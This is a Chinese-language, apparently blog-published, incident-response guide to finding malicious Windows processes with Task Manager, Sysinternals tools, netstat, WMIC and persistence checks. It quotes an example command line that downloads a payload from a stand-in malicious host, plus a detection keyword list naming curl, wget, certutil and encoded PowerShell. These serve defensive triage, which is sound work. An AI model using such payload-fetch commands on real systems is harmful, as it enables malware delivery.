Windows进程排查实战:从告警到溯源,快速定位恶意进程
1. 从一次真实的“挖矿”告警说起那天晚上十一点我正打算关电脑安全运营中心SOC的告警平台突然弹出一条高优先级告警某台核心业务服务器的CPU使用率在十分钟内从15%飙升至98%并持续不下。告警标题很直接“疑似恶意挖矿活动”。我心头一紧这可不是小事。登录服务器一看任务管理器里一个名为“svchost.exe”的进程赫然占用了近90%的CPU。有经验的朋友可能已经笑了svchost是Windows的系统进程本身没问题但问题在于它通常不会如此“勤奋”。这就像你家物业的保安svchost突然开始疯狂地挖你家后院这显然不对劲。这就是Windows进程排查在应急响应中的核心价值在浩如烟海的系统进程中快速、准确地揪出那个“披着羊皮的狼”。无论是挖矿木马、勒索软件、后门程序还是内鬼操作其恶意行为最终都要通过进程这个载体来执行。不会有无缘无故的高CPU、高内存也不会有凭空出现的陌生网络连接一切异常都有其对应的进程根源。今天我就结合多年一线实战经验抛开那些华而不实的理论带你走一遍从告警触发到定性收尾的完整Windows进程排查链路。这不是教科书而是一份能直接“抄作业”的实战手册。2. 第一响应建立排查基线与快速“三看”接到告警或异常报告后切忌一头扎进细节。首先需要建立一个清晰的排查思路和操作基线确保动作不变形同时避免打草惊蛇如果攻击者还在线。我的习惯是登录目标系统后先进行“三看”这能在30秒内对系统状态有个初步判断。2.1 一看系统整体观感与用户会话首先观察系统是否卡顿当前登录的用户是谁。直接按Ctrl Shift Esc打开任务管理器先看“用户”选项卡。这里列出了所有活跃的会话。你需要重点关注非预期用户除了管理员、系统服务以及已知的业务运行账户是否出现了其他陌生用户如Guest、带奇怪前缀的用户名同一用户多会话一个用户是否在本地和通过RDP远程桌面同时登录这可能是横向移动的迹象。断开连接的会话检查是否有状态为“已断开”但未注销的会话攻击者可能借此保持访问。注意在真实的攻防对抗中高水平的攻击者会隐藏自己的会话。因此这里的观察只是一个初步筛选不能作为“无事发生”的依据。2.2 二看性能资源异常峰值紧接着切换到任务管理器的“性能”选项卡。这里你要像老中医“望闻问切”一样看几个关键指标CPU是否持续处于高位如80%是单个核心满载还是所有核心均高持续高CPU是挖矿、加密勒索软件、或正在进行数据压缩外传的典型标志。内存提交内存和已使用内存是否异常高企且持续增长这可能意味着存在内存马、大型文件操作或程序存在内存泄漏但恶意软件导致泄漏的情况相对较少。磁盘活动时间是否长期100%磁盘读写速度是否异常高这常见于勒索软件加密文件、或恶意软件大量读写日志、下载组件。网络发送和接收的流量是否在空闲时段依然活跃网卡是否持续有数据包吞吐这指向数据外泄、C2命令与控制通信或蠕虫传播。发现异常指标后先别急着结束进程记下这个状态。它是你后续深度排查的起点。2.3 三看进程列表的“奇装异服者”最后也是最重要的一步看“进程”选项卡。默认视图信息有限你需要点击“查看” - “选择列”添加几个关键字段PID进程标识符进程的唯一身份证后续所有操作都依赖它。命令行这是黄金信息它显示了启动该进程的完整命令恶意进程的伪装往往在这里露馅。启动时间对比异常时间点告警触发时间寻找那个之后启动的进程。工作集内存CPU时间定位资源消耗大户。现在滚动列表用“侦探”的眼光扫描看名称是否有模仿系统进程的“李鬼”例如svchost.exe(正常) vssvch0st.exe(可疑)、lsass.exe(正常) vsIsass.exe(数字1替换字母l可疑)、csrss.exevscsrsss.exe。看路径正常系统进程的路径通常在C:\Windows\System32或C:\Windows\SysWOW64。如果一个挂着系统进程名的文件从C:\Users\Public、C:\Temp或某个软件的非标准目录启动高度可疑。看命令行这是破案关键。一个svchost.exe如果后面跟了一串指向某个可疑脚本或可执行文件的路径那它就是在为这个恶意负载“打掩护”。例如看到svchost.exe -k netsvcs是正常的但看到svchost.exe -c “C:\Users\test\malware.dll”就极不正常。完成这“三看”你已经对战场有了初步地图。接下来就要动用更专业的工具进行深度侦查和取证。3. 深度侦查专业工具链与关键信息提取任务管理器只是个“随身匕首”真正要打硬仗得用“专业装备”。下面这套工具链是我在Windows应急响应中最常用、也最高效的组合拳。3.1 进程信息收集的“瑞士军刀”Process Explorer微软Sysinternals套件中的Process Explorer是取代任务管理器的神器。以管理员身份运行它你会获得一个颜色编码、信息无比丰富的进程树。进程树视图清晰展示父子进程关系。恶意软件常常由explorer.exe用户点击触发、svchost.exe服务触发或计划任务schtasks.exe派生出来。通过进程树你可以溯源到它的“启动父进程”。验证签名与路径悬停在进程上可以直接看到公司名称验证签名、完整路径。一个没有有效数字签名、或签名无效显示为红色的“系统关键进程”基本可以确定是恶意程序。句柄与DLL查看双击一个进程在“句柄”选项卡中可以看到它打开了哪些文件、注册表键、甚至命名管道。在“性能”选项卡的“线程”里可以查看CPU占用最高的具体线程有时恶意代码会注入到合法进程的某个线程中执行。在“TCP/IP”选项卡可以直接看到该进程的所有网络连接比netstat更直观。实战技巧当你发现一个可疑进程不要急于结束。先用Process Explorer右键“属性”查看“映像”选项卡下的“命令行”和“启动时间”并切换到“TCP/IP”查看网络连接。然后右键选择“创建转储” - “创建迷你转储”这将保存该进程内存的一个快照供后续进行静态分析或沙箱检测这是重要的取证证据。3.2 网络连接排查netstat与TCPView进程的网络行为是其恶意的直接体现。命令行工具netstat是基本功但需要结合进程信息。netstat -ano | findstr ESTABLISHED这个命令列出所有已建立的连接并显示对应的PID-o选项。记下可疑的外网IP和端口对应的PID。但更直观的是使用TCPView同样来自Sysinternals。它实时、动态地以列表形式展示所有进程的网络连接TCP/UDP包括本地/远程地址、端口、状态并且用颜色区分绿色新建红色关闭黄色已更改。你可以一眼看出哪个进程在频繁连接某个陌生的外部IP尤其是在ESTABLISHED状态下。排查要点重点关注连接到非常用端口如高端口、6666、8888等、非常规国家/地区IP以及状态为CLOSE_WAIT或TIME_WAIT异常多的进程这可能表示频繁的短连接通信C2心跳。3.3 进程命令行与参数深度分析命令行参数是恶意进程的“犯罪动机”说明书。除了在Process Explorer中查看还可以用WMIC命令进行批量收集和筛选这在多台机器排查时尤其有用。wmic process get ProcessId,ParentProcessId,CommandLine,ExecutablePath,Name, CreationDate /format:csv processes.csv这条命令将所有进程的详细信息导出到CSV文件你可以用Excel打开对“CommandLine”列进行筛选。例如搜索包含“powershell”、“cmd”、“-enc”可能为PowerShell编码命令、“-e”可能为bash编码命令、“curl”、“wget”、“certutil”等常用于下载或执行恶意代码的命令行参数。一个经典案例我曾遇到一个案例恶意进程将自己伪装成java.exe但它的命令行是java.exe -jar C:\Users\Public\update.jar http://malicious-site.com/payload.bin。这明显是利用Java进程去下载并执行远程载荷-jar后面跟的本地jar包可能只是个下载器。3.4 自动启动项与持久化位置排查恶意软件为了在重启后存活必须将自己写入某个自动启动项。这是排查的必经之路。你需要检查以下所有位置注册表启动项HKCU\Software\Microsoft\Windows\CurrentVersion\RunHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run(32位程序在64位系统)更隐蔽的RunOnce、RunServices等键。 使用regedit查看或用命令reg query导出。计划任务攻击者最爱。使用schtasks /query /fo LIST /v或直接打开“任务计划程序”管理单元仔细查看每个任务特别是那些由“未知发布者”创建、触发器为“系统启动”或“用户登录”、操作为启动一个可疑程序或脚本的任务。服务恶意服务通常以.sys驱动或.exe形式存在。使用sc query state all或Get-Service(PowerShell) 列出所有服务关注“描述”为空、显示名称奇怪、可执行文件路径异常的服务。文件系统启动文件夹C:\Users\用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartupC:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup其他Winlogon通知包、LSA扩展、WMI事件订阅等更隐蔽的持久化方式需要借助AutorunsSysinternals另一神器进行全盘扫描。4. 对抗高级威胁隐藏进程、进程注入与内存马普通的恶意进程很容易被上述方法发现。但高级攻击者会采用各种手段隐藏自己这时就需要更底层的排查技术。4.1 检测进程伪装与隐藏进程空洞Process Hollowing恶意软件创建一个合法的进程如svchost.exe并挂起然后将其内存代码“挖空”替换为自己的恶意代码再恢复执行。从进程列表看它就是一个正常的svchost.exe。检测方法使用Process Explorer对比进程的磁盘映像路径和内存中加载的映像路径是否一致。也可以检查进程内存区域的属性是否有异常如可执行内存区域过大。DLL劫持与搜索顺序加载恶意DLL被放置在合法应用程序的搜索路径中通常是程序所在目录并优先于系统目录下的合法DLL被加载。检测方法使用Process MonitorProcMonSysinternals套件设置过滤器只监控目标进程的Load Image操作观察其加载的DLL列表和路径寻找从非系统目录加载的DLL。直接内核对象操作DKOM这是rootkit级别的技术恶意驱动直接从内核层操作进程链表将自身进程从活动进程列表中“抹去”。常规工具完全看不到。检测方法需要对比不同层次的枚举结果。例如使用tasklist用户层、Process Explorer用户层、PCHunter内核层等工具交叉比对进程列表。如果用户层工具看到的进程数远少于内核层工具则可能存在DKOM隐藏。在应急响应中更直接的方法是分析内存转储或使用专杀工具。4.2 排查进程注入与代码注入这是将恶意代码注入到合法进程如explorer.exe,lsass.exe,svchost.exe内存空间的技术实现“借壳上市”。远程线程注入恶意进程在目标进程中创建一个远程线程来执行自己的代码。检测方法在Process Explorer中查看可疑的合法进程如CPU突然增高的explorer.exe切换到“线程”选项卡查看其线程的起始地址。如果某个线程的起始地址指向一个陌生的DLL模块非该进程通常加载的模块则很可能被注入了。也可以使用Sysinternals的ListDLLs工具查看进程加载的所有DLL寻找异常项。APC注入、SetWindowHookEx注入等其他常见的注入方式。通用排查思路关注那些行为异常的“干净”进程。如果一个平时很安静的svchost.exe实例突然开始进行网络连接或大量文件操作就需要高度怀疑。使用Process Monitor实时监控该进程的所有文件、注册表、网络活动往往能发现蛛丝马迹。4.3 无文件攻击与内存马的排查这是当前最棘手的威胁之一。恶意载荷不落地直接通过PowerShell、WMI、.NET CLR等方式加载到内存中执行没有独立的进程实体。PowerShell 无文件攻击攻击者通过一行编码的PowerShell命令直接从网络下载并执行恶意代码。检测方法检查系统日志事件查看器 - Windows日志 - PowerShell但高版本默认不记录。检查C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx日志如果启用了模块日志记录。更有效的是使用进程内存分析。如果发现powershell.exe进程存在但其命令行参数极其简短或包含-enc后面跟着一长串Base64编码这就是强烈信号。可以使用Get-Process抓取所有PowerShell进程的完整命令行。.NET CLR 内存马将恶意.NET程序集直接加载到诸如w3wp.exe(IIS) 等进程的内存中。检测方法对于IIS服务器可以使用dotnet-counters或Procdump导出w3wp.exe进程的dump文件然后使用dnSpy或ILSpy等.NET反编译工具分析dump中的程序集寻找非微软签名的、可疑的程序集名称和代码逻辑。WMI 持久化与执行恶意代码存储在WMI仓库中通过WMI事件触发执行。检测方法使用命令Get-WmiObject -Namespace root\Subscription -Class __EventFilter和Get-WmiObject -Namespace root\Subscription -Class __EventConsumer等检查是否有可疑的永久事件订阅。工具WMI Explorer或Autoruns的WMI选项卡也能辅助查看。面对这些高级威胁单纯的进程列表查看已经不够必须结合日志分析、内存取证和行为监控进行综合判断。5. 构建排查工作流与取证意识掌握了工具和技术还需要将它们串联成一个高效、有序的工作流并在每个环节保有取证意识因为你的操作本身可能就是司法证据链的一部分。5.1 标准化的排查流程SOP我建议遵循以下步骤确保排查全面且不遗漏信息收集不扰动首先使用非侵入式命令收集信息如systeminfo,netstat -ano,tasklist /svc,schtasks /query /fo LIST /v以及使用WMIC或PowerShell Get-Process收集进程全量信息。全程截图或录屏。初步分析与假设基于收集的信息形成初步假设例如“PID 4412的陌生进程可能是挖矿木马其父进程是PID 1234的PowerShell”。深度验证与溯源针对假设使用Process Explorer查看进程树、句柄、DLL使用Process Monitor过滤该PID查看其历史文件、注册表操作检查其对应的自动启动项。遏制与清除在确认恶意进程后先尝试结束进程树。但要注意有些进程有守护或互斥可能结束不掉或很快复活。此时需要先清除其持久化机制删除计划任务、注册表项、服务再结束进程最后删除磁盘上的恶意文件。恢复验证与加固清除后再次执行步骤1的信息收集确认异常消失。检查系统关键位置是否被篡改并根据入侵途径如漏洞、弱口令进行针对性加固。5.2 关键取证步骤内存与磁盘转储在应急响应中“抓活体”比事后分析日志更重要。内存转储对于可疑进程务必在结束前使用Process Explorer的“创建转储”功能生成迷你转储.dmp文件。对于整个系统可以使用DumpIt、WinPMEM或Belkasoft Live RAM Capturer工具获取完整物理内存镜像。内存中可能包含加密密钥、未落地的恶意代码、网络连接信息等宝贵证据。磁盘文件取证在删除恶意文件前先进行复制备份。使用cmd的copy命令或PowerShell的Copy-Item并附带计算文件的哈希值MD5, SHA1, SHA256这个哈希值可以用于威胁情报比对。certutil -hashfile C:\path\to\suspect.exe SHA256时间线分析恶意文件的创建、修改、访问时间MACE时间是重要线索。可以使用PowerShell或专业取证工具分析围绕异常时间点发生的所有文件系统活动找出攻击者的行动轨迹。5.3 常见误报与排除技巧不是所有异常进程都是恶意的避免误杀业务进程同样重要。杀毒软件与安全产品它们的行为扫描、更新可能导致CPU/内存/磁盘短暂飙升。熟悉你环境中安全产品的进程名和行为模式。Windows更新与维护任务TiWorker.exe,MsMpEng.exe(Windows Defender),svchost.exe(netsvcs组) 在更新时资源占用会很高。业务应用Java应用 (java.exe)、数据库 (sqlservr.exe)、中间件等可能在业务高峰时资源吃紧。需要与业务负责人确认其基线性能。排查技巧对于可疑进程先将其哈希值上传到VirusTotal等在线沙箱进行扫描。查看其数字签名是否有效、是否来自可信发布者。在隔离环境中运行观察其行为。同时结合网络侧流量分析设备如IPS、全流量的日志看该进程对应的网络连接是否访问了已知的恶意域名或IP。进程排查是一门实践性极强的技术它需要你对Windows系统有深入的理解对恶意软件的常见行为模式有敏锐的嗅觉更需要你在一次次真实的应急响应中积累经验和直觉。记住没有一劳永逸的银弹最好的工具是你的分析思路和不断更新的知识库。从建立基线开始大胆假设小心求证你就能在纷繁复杂的进程海洋中精准地锁定那个破坏系统安宁的“元凶”。

相关新闻

AI量化投资实战:从NLP情感分析到强化学习的全栈技术解析

AI量化投资实战:从NLP情感分析到强化学习的全栈技术解析

1. AI炒股:从概念炒作到实战落地的深度解析最近几年,AI炒股这个词的热度居高不下,无论是财经媒体还是技术社区,总能看到它的身影。很多人第一反应是:这不就是让机器人替我炒股票吗?听起来既科幻又危险。作为…

2026/8/6 5:19:49 阅读更多 →
从数据爬取到模型训练:构建高质量图片数据集的完整实践指南

从数据爬取到模型训练:构建高质量图片数据集的完整实践指南

1. 项目缘起与核心诉求最近在做一个内容安全相关的项目,需要大量的、高质量的图片数据来训练一个鉴黄模型。这事儿听起来挺高大上,但实际操作起来,第一步“找数据”就让人头大。公开的数据集要么太旧,要么类别不全,要么…

2026/8/6 5:20:24 阅读更多 →
从视觉理解到物理操作:OpenClaw AI代理的架构、部署与应用场景解析

从视觉理解到物理操作:OpenClaw AI代理的架构、部署与应用场景解析

1. 项目概述:当AI不只是“看”,而是开始“动手”最近在AI圈子里,OpenClaw这个名字的热度有点高。如果你还在琢磨怎么让大语言模型(LLM)更好地理解图片,或者怎么用Stable Diffusion生成更精准的图&#xff0…

2026/8/6 5:21:08 阅读更多 →

最新新闻

STM32 LTDC配置详解:从时序参数到SDRAM与DMA2D优化实践

STM32 LTDC配置详解:从时序参数到SDRAM与DMA2D优化实践

1. 从零开始:为什么STM32的LTDC配置是个“技术活”?如果你正在用STM32做带屏项目,尤其是那种需要驱动RGB接口的TFT液晶屏,那么LTDC(LCD-TFT Display Controller)这个外设你一定绕不开。很多朋友第一次接触L…

2026/8/6 7:10:13 阅读更多 →
跨境电商浏览器是什么?多店铺安全环境怎么搭建

跨境电商浏览器是什么?多店铺安全环境怎么搭建

跨境电商浏览器是一类用于管理多平台、多店铺账号登录环境的工具,核心作用是把不同店铺的浏览器指纹、网络代理、Cookie、账号资料和团队权限分开管理,降低混登、串号和环境混用带来的关联风险。对只运营一个店铺的卖家来说,普通浏览器通常已…

2026/8/6 7:10:13 阅读更多 →
从商品图片到爆款视频:AI正在改变跨境电商内容生产方式

从商品图片到爆款视频:AI正在改变跨境电商内容生产方式

过去几年,跨境电商卖家的内容竞争主要围绕“谁有更好的拍摄能力”。拥有专业摄影团队、海外模特资源、成熟剪辑团队的品牌,往往能够持续产出高质量短视频。但随着 AI 视频技术快速发展,电商内容生产正在发生新的变化。越来越多商家开始发现&a…

2026/8/6 7:10:13 阅读更多 →
STM32F407 GPIO入门:从LED控制到PWM呼吸灯实战

STM32F407 GPIO入门:从LED控制到PWM呼吸灯实战

1. 从零开始的STM32F407ZGT6之旅:为什么是GPIO和LED?如果你刚拿到一块STM32F407ZGT6的开发板,看着密密麻麻的引脚和陌生的开发环境,可能会有点无从下手。别担心,几乎所有嵌入式工程师的“Hello World”都是从点亮一个L…

2026/8/6 7:10:13 阅读更多 →
音频啸叫抑制芯片选型:ES56031与PH56031技术解析与实战指南

音频啸叫抑制芯片选型:ES56031与PH56031技术解析与实战指南

1. 从“啸叫”到“抑制”:一个音频工程师的日常烦恼做音频工程或者搞会议系统集成的朋友,对“啸叫”这个词绝对是深恶痛绝。你正调试得好好的,话筒音量稍微推大一点,或者发言人靠近了音箱,突然一阵尖锐刺耳、让人头皮发…

2026/8/6 7:10:13 阅读更多 →
Cloudflare Workers AI 实践指南:边缘部署 Kimi 与 GLM 大模型

Cloudflare Workers AI 实践指南:边缘部署 Kimi 与 GLM 大模型

这次我们来看一个关于 Cloudflare Workers AI 如何高效运行 Kimi 和 GLM 大模型的技术实践。对于开发者而言,直接部署和调用大型语言模型(LLM)往往面临显存占用高、推理速度慢、成本难以控制等挑战。Cloudflare 通过其 Workers AI 平台&#…

2026/8/6 7:09:13 阅读更多 →

日新闻

深入解析LimboAI C++内核:架构设计与性能优化实战

深入解析LimboAI C++内核:架构设计与性能优化实战

1. 项目概述:为什么我们需要深入LimboAI的C内核?如果你是一名使用Godot引擎的游戏开发者,尤其是对AI行为逻辑有较高要求的项目,那么LimboAI这个名字你大概率不会陌生。它作为Godot 4生态中一个备受瞩目的行为树与状态机插件&#…

2026/8/6 0:00:06 阅读更多 →
Unity 2D游戏敌人AI系统:基于PlayMaker状态机与2D Toolkit的实战开发

Unity 2D游戏敌人AI系统:基于PlayMaker状态机与2D Toolkit的实战开发

1. 项目概述与核心思路大家好,我是老张,一个在游戏开发一线摸爬滚打了十多年的老码农。今天咱们接着聊《空洞骑士》风格2D动作游戏的Demo制作。上一期我们搭好了基础框架,处理了角色移动和碰撞,这一期,我们要让游戏世界…

2026/8/6 0:00:06 阅读更多 →
被动防火门市场前景发展趋势

被动防火门市场前景发展趋势

被动防火门依靠材质结构、密闭构造阻隔烟火蔓延,无需电控启动,是建筑被动消防系统核心构件,行业依托新规管控、城市更新、工业安全升级迎来稳定扩容,整体朝着合规化、专项化、低碳化、智能化方向发展。现阶段 GB12955‑2024 新版国…

2026/8/6 0:00:06 阅读更多 →

周新闻

最大流算法详解:从水管网络到Ford-Fulkerson与Dinic实战

最大流算法详解:从水管网络到Ford-Fulkerson与Dinic实战

1. 从水管网络到最大流:一个核心问题的诞生想象一下,你是一个城市供水系统的总工程师。你的城市有多个水源(水库),需要通过一个复杂的地下管道网络,将水输送到各个居民区。每条管道都有其最大通水能力&…

2026/8/5 15:00:43 阅读更多 →
基于Springboot的企业门户网站(源码+LW+调试文档+讲解)

基于Springboot的企业门户网站(源码+LW+调试文档+讲解)

温馨提示:本人主页置顶文章(点我)开头有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:本人主页置顶文章(点我)开头有 CSDN 平台官方提供的学长联系方式的名片! 温馨提示:本人主页置顶文章(点我)开头有 CSDN 平台…

2026/8/5 13:13:56 阅读更多 →
MATLAB xcorr函数详解:从互相关原理到四大实战应用

MATLAB xcorr函数详解:从互相关原理到四大实战应用

1. 从一次信号“找茬”说起:为什么我们需要互相关几年前,我在处理一组声学传感器数据时遇到了一个棘手的问题。我有两个麦克风记录了一段相同的音频信号,理论上它们接收到的声音波形应该非常相似,只是由于麦克风位置不同&#xff…

2026/8/5 10:20:36 阅读更多 →

月新闻

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南 【免费下载链接】BaiduNetdiskPlugin-macOS For macOS.百度网盘 破解SVIP、下载速度限制~ 项目地址: https://gitcode.com/gh_mirrors/ba/BaiduNetdiskPlugin-macOS 还在为百度网盘macOS版的龟速下…

2026/8/5 23:28:39 阅读更多 →
终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 还在为网易云音乐下载的NCM格式文件无法在其他播放器播放而烦恼吗?ncmdump解密工具帮你轻松解决这个困…

2026/8/5 21:00:14 阅读更多 →
HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

AgentCard 智能体卡片:为英语学习 App 打造桌面级学习助手适用平台:HarmonyOS 7.0 (API 26 Beta)一、引言 HarmonyOS 7.0(API 26 Beta)新增了 AgentCard 智能体卡片能力,这是继 HMAF(鸿蒙智能体框架&#x…

2026/8/5 23:46:51 阅读更多 →